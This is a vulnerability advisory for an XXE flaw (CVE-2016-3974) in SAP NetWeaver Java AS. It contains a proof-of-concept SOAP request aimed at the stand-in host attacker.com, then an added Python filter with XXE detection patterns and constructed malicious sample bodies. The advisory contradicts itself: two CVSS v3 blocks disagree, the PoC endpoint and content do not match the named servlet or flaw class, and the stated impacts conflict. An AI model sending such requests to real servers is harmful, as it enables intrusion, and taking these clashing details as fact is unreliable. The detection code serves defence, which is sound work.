ERPScan advisory ERPSCAN-16-013
Published: Oct 20, 2015, 12:00 a.m.

SAP NetWeaver Java AS ctcprotocol servlet - XXE vulnerability

2015-10-20 00:00:00
Source: erpscan.io

CVSS3: 9.1 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: HIGH

CVSS2: 6.4 Medium
AV:N/AC:L/Au:N/C:P/I:N/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: PARTIAL

EPSS: 0.011 Low
Percentile: 82.9%

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver 7.1 – 7.5
Vendor URL: SAP
Bug: XXE
Reported: 20.10.2015
Vendor response: 21.10.2015
Date of Public Advisory: 08.03.2016
Reference: SAP Security Note 2235994
Author: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: XXE
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE-2016-3974

CVSS Information
CVSS Base Score v3: 6.4 / 10
CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)

Description
An authorized attacker can use a specially crafted request to read files from the server and then escalate his or her privileges.

Business risk
Attackers can send any packets to any port of any system, including localhost.
This means it is possible, for example, to send any administrative command to the Gateway or Message Server, because the source of the packet will be localhost and there are no restrictions for localhost. Another example is an attack on other interfaces.

VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.1 – 7.5
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2235994.

TECHNICAL DESCRIPTION

An XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request related to the ctcprotocol servlet.

PoC

POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
Content-Type: text/xml

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
<m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
<url>attacker.com</url>
</m:XXX>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
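The permanent fix is SAP Security Note 2235994. Until it is applied, a defender's compensating control is to refuse inbound SOAP bodies that carry what a legitimate request never needs: a DOCTYPE, entity declarations, or references to custom entities. The following is an added example written for this page, not code from ERPScan or SAP; it assumes the request body is already available as a string (for example in a reverse proxy, WAF rule engine or servlet filter in front of the web service), and the sample requests, the host name `monitoring.example` and the `file:///PLACEHOLDER` URI are constructed for the demonstration. It also generalises beyond the advisory's PoC shape to cover entity-expansion (denial-of-service) bodies and parameter entities.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"

# Patterns that indicate DTD-driven content in an inbound XML body.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE | re.DOTALL)
_PARAM_ENTITY = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)
_ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")
# The five entities XML predefines; only references to anything else are suspicious.
_PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}


def xxe_indicators(body: str) -> List[str]:
    """Return the XXE-related indicators found in a raw request body, in a fixed order."""
    found = []
    if _DOCTYPE.search(body):
        found.append("doctype")
    if _EXTERNAL_ENTITY.search(body):
        found.append("external-entity")          # SYSTEM/PUBLIC: file or network fetch
    if _PARAM_ENTITY.search(body):
        found.append("parameter-entity")         # %name; entities used in out-of-band variants
    custom_refs = {m.group(1) for m in _ENTITY_REF.finditer(body)} - _PREDEFINED
    if custom_refs:
        found.append("custom-entity-reference")  # expansion of a declared entity (DoS or exfil)
    return found


def parse_soap_request(body: str) -> Optional[Dict[str, str]]:
    """Reject any body with XXE indicators; otherwise parse it and return the
    operation's child elements as a local-name -> text map (None on rejection)."""
    if xxe_indicators(body):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    soap_body = root.find(f"{{{SOAP_ENV}}}Body")
    if soap_body is None:
        return None
    params: Dict[str, str] = {}
    for operation in soap_body:
        for child in operation:
            local_name = child.tag.rsplit("}", 1)[-1]
            params[local_name] = (child.text or "").strip()
    return params


# Constructed sample bodies (the benign one follows the advisory's envelope shape).
BENIGN_REQUEST = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
      <url>monitoring.example</url>
    </m:XXX>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# Constructed: external entity pointing at a placeholder URI.
XXE_REQUEST = """<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///PLACEHOLDER">]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
      <url>&ext;</url>
    </m:XXX>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# Constructed: internal entities only, the shape used for expansion-based denial of service.
EXPANSION_REQUEST = """<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;">]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
      <url>&b;</url>
    </m:XXX>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


if __name__ == "__main__":
    for name, body in [("benign", BENIGN_REQUEST), ("xxe", XXE_REQUEST), ("expansion", EXPANSION_REQUEST)]:
        print(name, xxe_indicators(body), parse_soap_request(body))
```

The indicator list doubles as a detection signature: logging it per rejected request gives a SOC a concrete reason string rather than a bare 400. Screening the raw text before handing it to any parser matters because the dangerous work (file read, outbound connection, entity expansion) happens inside the parser itself, so a check performed after parsing is already too late.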
